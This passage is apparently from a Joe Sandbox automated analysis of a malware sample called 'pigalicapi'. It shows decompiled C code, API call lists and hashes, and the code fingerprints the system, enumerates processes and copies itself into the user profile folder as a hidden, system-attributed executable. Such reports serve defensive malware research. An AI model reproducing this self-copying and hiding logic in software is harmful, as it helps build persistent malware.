                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					DeleteCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                          0x04004026
                                                                                                                                                                                                                                                                          0x0400402e
                                                                                                                                                                                                                                                                          0x0400405a
                                                                                                                                                                                                                                                                          0x0400405f
                                                                                                                                                                                                                                                                          0x04004066
                                                                                                                                                                                                                                                                          0x0400406f
                                                                                                                                                                                                                                                                          0x04004080
                                                                                                                                                                                                                                                                          0x04004086
                                                                                                                                                                                                                                                                          0x0400408a
                                                                                                                                                                                                                                                                          0x0400408d
                                                                                                                                                                                                                                                                          0x0400409f
                                                                                                                                                                                                                                                                          0x040040af
                                                                                                                                                                                                                                                                          0x040040b9
                                                                                                                                                                                                                                                                          0x040040c6
                                                                                                                                                                                                                                                                          0x040040cc
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040da
                                                                                                                                                                                                                                                                          0x040040de
                                                                                                                                                                                                                                                                          0x040040e6
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040f7
                                                                                                                                                                                                                                                                          0x04004101
                                                                                                                                                                                                                                                                          0x04004118
                                                                                                                                                                                                                                                                          0x0400411e
                                                                                                                                                                                                                                                                          0x0400413d
                                                                                                                                                                                                                                                                          0x04004143
                                                                                                                                                                                                                                                                          0x04004153
                                                                                                                                                                                                                                                                          0x04004158
                                                                                                                                                                                                                                                                          0x0400415b
                                                                                                                                                                                                                                                                          0x0400416d
                                                                                                                                                                                                                                                                          0x0400417f
                                                                                                                                                                                                                                                                          0x0400418e
                                                                                                                                                                                                                                                                          0x04004193
                                                                                                                                                                                                                                                                          0x04004199
                                                                                                                                                                                                                                                                          0x0400419f
                                                                                                                                                                                                                                                                          0x040041a5
                                                                                                                                                                                                                                                                          0x040041af
                                                                                                                                                                                                                                                                          0x040041bb
                                                                                                                                                                                                                                                                          0x040041d2
                                                                                                                                                                                                                                                                          0x040041bd
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041e3
                                                                                                                                                                                                                                                                          0x040041f7
                                                                                                                                                                                                                                                                          0x04004203
                                                                                                                                                                                                                                                                          0x0400420c
                                                                                                                                                                                                                                                                          0x04004216
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400422d
                                                                                                                                                                                                                                                                          0x04004242
                                                                                                                                                                                                                                                                          0x04004249
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400425e
                                                                                                                                                                                                                                                                          0x04004265
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x04004277
                                                                                                                                                                                                                                                                          0x04004281
                                                                                                                                                                                                                                                                          0x0400428e
                                                                                                                                                                                                                                                                          0x04004294
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x040042a6
                                                                                                                                                                                                                                                                          0x040042af
                                                                                                                                                                                                                                                                          0x040042b6
                                                                                                                                                                                                                                                                          0x040042bb
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x0400409c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                          0x040042dd

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0400422D
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0400423C
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 04004258
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 0400426D
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 04004277
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400428E
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 040042A6
                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1593741596-0
                                                                                                                                                                                                                                                                          • Opcode ID: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                          • Instruction ID: 8bdf0d2272c993105e18f632bfcb20d3462f1ee8570acd5c3bdc395bff94e74a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A910D74A04208AFEB14DFA4D849BDDBBB5FB48705F108219FA05BB2C0D778A984CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                          			E04005700(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                                                                                          				long _v560;
                                                                                                                                                                                                                                                                          				void* _v564;
                                                                                                                                                                                                                                                                          				long _v568;
                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					E04008F80(_a4, 0x100, _a4 + 0x437); // executed
                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
                                                                                                                                                                                                                                                                          					E04001CA0(_a4 + 0x204, 0x104); // executed
                                                                                                                                                                                                                                                                          					E04009D20( &_v24, _a4 + 0x40c, 0x27); // executed
                                                                                                                                                                                                                                                                          					E04007B70(_a4 + 0x45b,  &_v24, 0x10);
                                                                                                                                                                                                                                                                          					_t59 = E04005CD0(_a4 + 0x100); // executed
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
                                                                                                                                                                                                                                                                          					lstrcpyA(_a4 + 0x43b, "pigalicapi");
                                                                                                                                                                                                                                                                          					E04007D20( &_v556,  &_v556, 0, 0x208);
                                                                                                                                                                                                                                                                          					_v28 = 0x207;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
                                                                                                                                                                                                                                                                          					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                          					_v32 = _t67;
                                                                                                                                                                                                                                                                          					if(_v32 != 0xffffffff) {
                                                                                                                                                                                                                                                                          						_v560 = GetFileSize(_v32, 0);
                                                                                                                                                                                                                                                                          						if(_v560 > 0) {
                                                                                                                                                                                                                                                                          							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          							_v564 = _t71;
                                                                                                                                                                                                                                                                          							if(_v564 != 0) {
                                                                                                                                                                                                                                                                          								_v568 = 0;
                                                                                                                                                                                                                                                                          								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
                                                                                                                                                                                                                                                                          								if(_v568 != _v560) {
                                                                                                                                                                                                                                                                          									VirtualFree(_v564, 0, 0x8000);
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									 *(_a4 + 0x453) = _v560;
                                                                                                                                                                                                                                                                          									 *(_a4 + 0x457) = _v564;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CloseHandle(_v32);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x04005709
                                                                                                                                                                                                                                                                          0x04005711
                                                                                                                                                                                                                                                                          0x04005729
                                                                                                                                                                                                                                                                          0x04005742
                                                                                                                                                                                                                                                                          0x04005756
                                                                                                                                                                                                                                                                          0x0400576e
                                                                                                                                                                                                                                                                          0x04005786
                                                                                                                                                                                                                                                                          0x04005798
                                                                                                                                                                                                                                                                          0x040057a3
                                                                                                                                                                                                                                                                          0x040057b8
                                                                                                                                                                                                                                                                          0x040057cc
                                                                                                                                                                                                                                                                          0x040057d4
                                                                                                                                                                                                                                                                          0x040057e4
                                                                                                                                                                                                                                                                          0x0400580a
                                                                                                                                                                                                                                                                          0x040057e6
                                                                                                                                                                                                                                                                          0x040057f1
                                                                                                                                                                                                                                                                          0x040057f1
                                                                                                                                                                                                                                                                          0x0400582f
                                                                                                                                                                                                                                                                          0x04005854
                                                                                                                                                                                                                                                                          0x0400585a
                                                                                                                                                                                                                                                                          0x04005861
                                                                                                                                                                                                                                                                          0x04005873
                                                                                                                                                                                                                                                                          0x04005880
                                                                                                                                                                                                                                                                          0x04005896
                                                                                                                                                                                                                                                                          0x0400589c
                                                                                                                                                                                                                                                                          0x040058a9
                                                                                                                                                                                                                                                                          0x040058ab
                                                                                                                                                                                                                                                                          0x040058d0
                                                                                                                                                                                                                                                                          0x040058e2
                                                                                                                                                                                                                                                                          0x04005912
                                                                                                                                                                                                                                                                          0x040058e4
                                                                                                                                                                                                                                                                          0x040058ed
                                                                                                                                                                                                                                                                          0x040058fc
                                                                                                                                                                                                                                                                          0x040058fc
                                                                                                                                                                                                                                                                          0x040058e2
                                                                                                                                                                                                                                                                          0x040058a9
                                                                                                                                                                                                                                                                          0x0400591c
                                                                                                                                                                                                                                                                          0x0400591c
                                                                                                                                                                                                                                                                          0x04005922
                                                                                                                                                                                                                                                                          0x04005922
                                                                                                                                                                                                                                                                          0x0400592c

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 0400580A
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005896
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040058D0
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04005912
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0400591C
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$CloseVirtuallstrlen$CreateProcess$AllocChangeDirectoryFindFirstFreeHandleModuleNameNotificationProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 560841407-4090404022
                                                                                                                                                                                                                                                                          • Opcode ID: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                          • Instruction ID: 5a1df65dd39d11d2feffdc598e8508d5089156913625d6b4e9fa29ff03a3d0d3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66515FB4944208BBFB14DF60DC59FEA7774EB44709F048168FA097A2C1D778AA81CF94
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 616 4001120-4001134 617 400113a-400113e 616->617 618 40012bb-40012c1 616->618 617->618 619 4001144-4001150 lstrlenA 617->619 619->618 620 4001156-4001162 lstrlenA 619->620 620->618 621 4001168-4001175 620->621 622 4001177-4001188 GetAllUsersProfileDirectoryA 621->622 623 400118a-400119b GetEnvironmentVariableA 621->623 624 40011a1-40011d9 wnsprintfA lstrcmpiA 622->624 623->624 625 4001216-4001287 call 40097a0 lstrcpyA * 2 CreateThread 624->625 626 40011db-40011e1 624->626 630 40012a3-40012b8 call 40097c0 625->630 631 4001289-400128d 625->631 626->625 627 40011e3-4001210 CopyFileA SetFileAttributesA lstrcpyA 626->627 627->625 630->618 632 400129a-40012a1 631->632 633 400128f-4001298 631->633 632->618 633->632
                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                          			E04001120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                                                                                          				void* _v288;
                                                                                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                                                                                          				void* _v560;
                                                                                                                                                                                                                                                                          				void* _v564;
                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x104;
                                                                                                                                                                                                                                                                          					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
                                                                                                                                                                                                                                                                          					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						CopyFileA(_a4,  &_v556, 0);
                                                                                                                                                                                                                                                                          						SetFileAttributesA( &_v556, 6);
                                                                                                                                                                                                                                                                          						lstrcpyA(_a4,  &_v556);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v560 = E040097A0(0x30d);
                                                                                                                                                                                                                                                                          					_v16 = _v560;
                                                                                                                                                                                                                                                                          					 *((char*)(_v16 + 0x30c)) = _a12;
                                                                                                                                                                                                                                                                          					lstrcpyA(_v16,  &_v556);
                                                                                                                                                                                                                                                                          					lstrcpyA(_v16 + 0x208, _a8);
                                                                                                                                                                                                                                                                          					_t58 = CreateThread(0, 0, E040012D0, _v16, 0, 0); // executed
                                                                                                                                                                                                                                                                          					_v288 = _t58;
                                                                                                                                                                                                                                                                          					if(_v288 == 0) {
                                                                                                                                                                                                                                                                          						_v564 = _v16;
                                                                                                                                                                                                                                                                          						E040097C0(_v564);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						if(_a20 != 0) {
                                                                                                                                                                                                                                                                          							 *_a20 = _v288;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                          0x04001129
                                                                                                                                                                                                                                                                          0x04001134
                                                                                                                                                                                                                                                                          0x04001168
                                                                                                                                                                                                                                                                          0x04001175
                                                                                                                                                                                                                                                                          0x0400119b
                                                                                                                                                                                                                                                                          0x04001177
                                                                                                                                                                                                                                                                          0x04001182
                                                                                                                                                                                                                                                                          0x04001182
                                                                                                                                                                                                                                                                          0x040011bd
                                                                                                                                                                                                                                                                          0x040011d9
                                                                                                                                                                                                                                                                          0x040011f0
                                                                                                                                                                                                                                                                          0x040011ff
                                                                                                                                                                                                                                                                          0x04001210
                                                                                                                                                                                                                                                                          0x04001210
                                                                                                                                                                                                                                                                          0x04001223
                                                                                                                                                                                                                                                                          0x0400122f
                                                                                                                                                                                                                                                                          0x04001238
                                                                                                                                                                                                                                                                          0x04001249
                                                                                                                                                                                                                                                                          0x0400125d
                                                                                                                                                                                                                                                                          0x04001274
                                                                                                                                                                                                                                                                          0x0400127a
                                                                                                                                                                                                                                                                          0x04001287
                                                                                                                                                                                                                                                                          0x040012a6
                                                                                                                                                                                                                                                                          0x040012b3
                                                                                                                                                                                                                                                                          0x04001289
                                                                                                                                                                                                                                                                          0x0400128d
                                                                                                                                                                                                                                                                          0x04001298
                                                                                                                                                                                                                                                                          0x04001298
                                                                                                                                                                                                                                                                          0x0400129a
                                                                                                                                                                                                                                                                          0x0400129a
                                                                                                                                                                                                                                                                          0x04001287
                                                                                                                                                                                                                                                                          0x040012c1

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                            • Part of subcall function 040097C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 040097CF
                                                                                                                                                                                                                                                                            • Part of subcall function 040097C0: HeapFree.KERNEL32(00000000), ref: 040097D6
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 0400119B
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE
                                                                                                                                                                                                                                                                          • API String ID: 1231128424-1744756051
                                                                                                                                                                                                                                                                          • Opcode ID: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                          • Instruction ID: 5a94151192094d4d6073c3e413aca9132142fa07401a96dcdce05a8263d9ef35
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A413675904208ABEB54CFA4D889BDE77B4EF48704F00C295F509AA281D779EA84CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                                                                                                          			E040099F0() {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
